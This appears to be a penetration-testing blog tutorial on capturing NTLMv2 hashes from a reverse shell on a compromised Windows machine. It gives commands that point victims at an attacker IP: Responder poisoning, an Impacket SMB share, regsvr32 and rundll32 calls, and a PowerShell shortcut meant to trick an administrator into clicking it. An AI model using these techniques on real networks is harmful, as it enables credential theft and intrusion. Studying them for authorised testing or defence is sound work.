So today I just wanted to write a simple post on explaining the method of Capturing Hashes (NTLM, NTLMv2, Etc). Let’s say we have access to a Victim machine but we are trying to Escalate our privileges, Maintain persistence or Execute Commands, various things can be done from here but I won’t dive too deep into what can be done, there are some very great post’s about that written already, I am just going to show various Techniques on how can we accomplish in capturing these pieces of Information to Use or Crack and grab a Plaintext password from it.
These examples will be used from a Reverse Shell, as not always we have the great GUI to use when we are in an engagement or simply it’s just not available because of X reason. I will try me best to work with this situation as I as well would love to be capable of running many techniques from just a simple Shell, [don’t know why but like it more that way].
In the first example I will use an awesome tool called “Responder” a great tool used for Posoning LLMNR and NBT-NS responses, this cool works great when a user mistakenly mistypes a network share, the reason it works is because when Microsoft can’t find the Network name (DNS) it will fall back to LLMNR and NBT-NS from here responder, Responds to the connection telling the user that “Yes I am [Insert Name Here] and will capture the Ntlmv2 hash used for Authentication here is a sample on how to capture it with your Shell.
Use the “dir” command and try to list an UN-existing share from here Responder will start it’s magic in responding to that UN-existing share.
A great tool from Impacket here we can create a fast SMB Server to share files and to Exfiltrate any Loot that we may find on the Network but we are focused in grabbing hashes, so how would this work?, Easy we setup the SMB Server and then we simply connect to it to capture the Hash.
In this example we also need to use the IP Addr of the attacking machine with it’s Share Name that we are trying to access.
dir \\<IP ADDR>\Fake-SMB
The user will receive an error like this if they ever try to access the Share you have to make sure to add SMB2Support for Compatibility Issues.
With this tool we can try and call an unexisting file from our Attacking Machine it will try to communicate and from here as well we will capture the Ntlmv2 Hash.
regsvr32.exe /s /u /i://10.0.2.15/@NotExist scrobj.dll
What about Shortcut Links, make our target thing that they are trying to visit a website but they actually pinged our Machine??, Well since we have a powershell Shell we can create a simple LNK File to do this. We can use the following:
$WshShell = New-Object -comObject WScript.Shell $shortcut = $WshShell.CreateShortcut("hash.url") $shortcut.TargetPath = "file://10.0.2.15/@NOTHERE" $shortcut.Save()
And finally we can just call it from Powershell or wait for Our Target to execute it, we might want to do some SE here and make it like we replaced an LNK of there own.
Yes as mentioned here, we can use Curl to capture NTLM hashes as well you mostly have to wonder about applications that make network connections as Curl is now integrated in Windows CMD and PowerShell it’s as simple as typing:
These are just a few techniques, methods which we can utilize from our trusty old ncat Shell and grab some NTLMv2 hashes and the good thing is that we don’t even need to Escalate Privileges we can just leave these files and wait for an Administrator to click them [It sometimes happens!] and we can capture those hashes as well from here we know how to proceed now we can use any Password Cracker [John, Hashcat, etc] To crack these hashes their are more techniques that are very useful for even catching a Shell [NTLM Relay] but we won’t dive into that I just wanted to demonstrate a few techniques on how to capture some hashes be wary it can be as simple as
rundll32.exe \\10.0.2.15\NOTHERE.txt,entrypoint . [Another technique not explained] but you get the idea these binaries have network connection’s not just to execute remote files or download but we can capture Hashes as well!.